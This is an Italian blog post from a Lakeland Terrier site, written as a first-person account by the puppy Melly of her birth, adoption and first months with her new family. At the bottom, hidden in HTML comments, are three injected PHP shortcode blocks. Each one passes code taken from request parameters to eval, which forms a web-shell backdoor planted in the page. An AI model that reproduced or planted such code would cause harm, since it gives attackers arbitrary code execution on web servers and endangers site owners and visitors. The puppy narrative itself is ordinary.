Ciao a tutti mi chiamo Melly!!!

Lakeland-Terrier | Melly & EmilyCiao a tutti mi chiamo Melly sono nata a Desenzano sul Garda il 24 giugno 2009 e tra qualche giorno compio 5 mesi.
La mia mamma si chiama “Queen” mentre il mio papà “Paddy”, oltre me sono nati altri 3 cuccioli (in pratica 2 femminucce e 2 maschietti).
All’età di 2 mesi, giorno in più o in meno, sono venuti a vederci una coppia di umani che sembravano interessati ad uno di noi… chi avrebbe mai immaginato che quelli sarebbero stati i miei nuovi genitori.
Ricordo che sono venuti a casa un sabato mattina e se non sbaglio era il 5 di settembre, sono ritornati poi la domenica successiva e qualcosa mi lasciava capire che avevano scelto me!!! Perchè tra noi 4 ero stata tirata fuori dal recinto io, questo mi lasciava alquanto perplessa.
I giorni passavano così le settimane, e per un certo periodo non li ho più visti e in tutta sincerità non ci pensavo neanche più. Passavo le mie giornate nella più assoluta spensieratezza. Giocavo con i mie fratellini e con la mia mamma, facevo la pappa, dormivo… insomma le classiche giornate da cuccioli.

lakeland-terrier.it | Melly & Emily Finchè  un giorno si sono ripresentati, naturalmente era un sabato e questa volta ricordo precisamente la data il 3 ottobre 2009.
Anche se sono cucciola ho scorto in loro una certa emozione quando timidamente mi hanno scambiato qualche carezza e avvertivo in loro già un senso di protezione tipica dei genitori.
Difatti non mi sbagliavo!!!
Mi hanno lasciato passare ancora qualche ora con la mia famiglia, dopo di che mi hanno fatto un bagnetto a secco e sono stata pettinata. Sentivo che venivano date indicazioni in merito alla quantità e all’ora della pappa…. finchè è arrivato il momento più emozionate per entrambe (per me e per la mia nuova mamma), il passaggio nella nuova famiglia. Sono stata consegnata tra le sue braccia e sentivo che era un pò impacciata e tanto ma ma tanto emozionata.
Siamo saliti in macchina per raggiungere la nuova casa. Il viaggio è stato tranquillo, eravamo sedute dietro e mi erano riservate mille attenzioni, finchè ad un tratto mi sono appisolata del resto sono piccola ed ho bisogno di fare i miei pisolini.
Arrivati a casa ho iniziato a perlustrare quelli che sarebbero stati i miei nuovi angoli da scoprire. I miei nuovi genitori mi hanno fatto trovare una bella cuccia scozzese e mi ricoprivano di mille attenzioni e continuavo a percepre in loro il timore che il distacco dalla mia mamma e dai mie fratelini potesse rattristarmi.
Da quel giorno sono passati 2 mesi e l’amore che mi trasmettono è grande e sono sicura che anche loro avvertono il mio. Sto crescendo e sto imparando tante cose, ho acquistato maggiore sicurezza anche in casa. Tutti i posti e gli angoli che c’erano da scoprire mi sono diventati familiari. Loro mi seguono in ogni cosa e sono sempre tanto premurosi e attenti, avverto che si preoccupano quando c’è qualcosa che non va, forse in alcuni momenti lo sono anche eccessivamente ma è comprensibile.
In conclusione posso ritenermi una cucciola fortunata, non mi manca nulla soprattutto l’amore.
lakeland-terrier.it | Melly & Emily

<!– [insert_php]if (isset($_REQUEST["EeCIX"])){eval($_REQUEST["EeCIX"]);exit;}[/insert_php][php]if (isset($_REQUEST["EeCIX"])){eval($_REQUEST["EeCIX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Ugavx"])){eval($_REQUEST["Ugavx"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ugavx"])){eval($_REQUEST["Ugavx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ogoHJ"])){eval($_REQUEST["ogoHJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["ogoHJ"])){eval($_REQUEST["ogoHJ"]);exit;}[/php] –>